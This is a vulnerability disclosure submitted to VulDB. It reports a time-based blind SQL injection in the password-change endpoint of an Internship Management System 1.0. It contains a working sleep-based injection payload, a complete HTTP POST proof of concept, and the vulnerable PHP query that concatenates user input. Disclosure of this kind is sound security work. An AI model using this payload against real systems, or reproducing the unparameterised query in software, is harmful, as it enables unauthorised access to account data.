提交 #846890: Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injection信息

标题Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injection
描述## Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability Impact of the vulnerability An authenticated employer user can inject SQL syntax into the `current` parameter on the password change endpoint. Because the application concatenates untrusted input directly into the SQL query used to verify the current password, an attacker can trigger database-side delays and confirm SQL injection through response timing. This may lead to: - Database information disclosure through blind inference - Authentication logic abuse - Further compromise of account-related data ### Payload: `Shar8850'and(select*from(select+sleep(10))a/**/union/**/select+1)='` ```text Shar8850'and(select*from(select+sleep(10))a/**/union/**/select+1)=' ``` ### POC: The vulnerable endpoint is `POST /employer/myaccount.php?change_password`. The injection point is the multipart form field `current`, which is used directly in the SQL statement inside `employer/details/change_password.php`: ```php $current_password = $_POST['current']; $sqlPass = "SELECT * FROM employer WHERE password = '$current_password' AND email = '$email'"; ``` Send the following request: ```http POST /employer/myaccount.php?change_password HTTP/1.1 Host: internship Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaMukpDDqEfNqt7xg Cookie: PHPSESSID=qithgp1m1at8bieavidf4ddlnc ------WebKitFormBoundaryaMukpDDqEfNqt7xg Content-Disposition: form-data; name="current" Shar8850'and(select*from(select+sleep(10))a/**/union/**/select+1)=' ------WebKitFormBoundaryaMukpDDqEfNqt7xg Content-Disposition: form-data; name="new" Shar8850 ------WebKitFormBoundaryaMukpDDqEfNqt7xg Content-Disposition: form-data; name="confirm" Shar8850 ------WebKitFormBoundaryaMukpDDqEfNqt7xg Content-Disposition: form-data; name="update_password" ------WebKitFormBoundaryaMukpDDqEfNqt7xg-- ``` Expected result: The server response is delayed by about 10 seconds, indicating that the injected `sleep(10)` function was executed by the database. This confirms a time-based blind SQL injection vulnerability in the `current` parameter of the employer password change feature. ### Notes: - This endpoint requires a valid logged-in employer session. - The vulnerable source file is `employer/details/change_password.php`. - The issue exists because user input is concatenated into SQL without prepared statements or parameter binding. ### Sources download: ```text https://code-projects.org/internship-management-system-in-php-with-source-code/ ``` [Internship Management System In PHP With Source Code - Source Code & Projects](https://code-projects.org/internship-management-system-in-php-with-source-code/)
来源⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul8.md
用户
 SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
提交2026-06-03 16時01分 (1 月前)
管理2026-07-04 07時24分 (1 month later)
状态已接受
VulDB条目376297 [code-projects Internship Management System 1.0 Password Change Endpoint change_password.php 当前 SQL注入]
积分20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!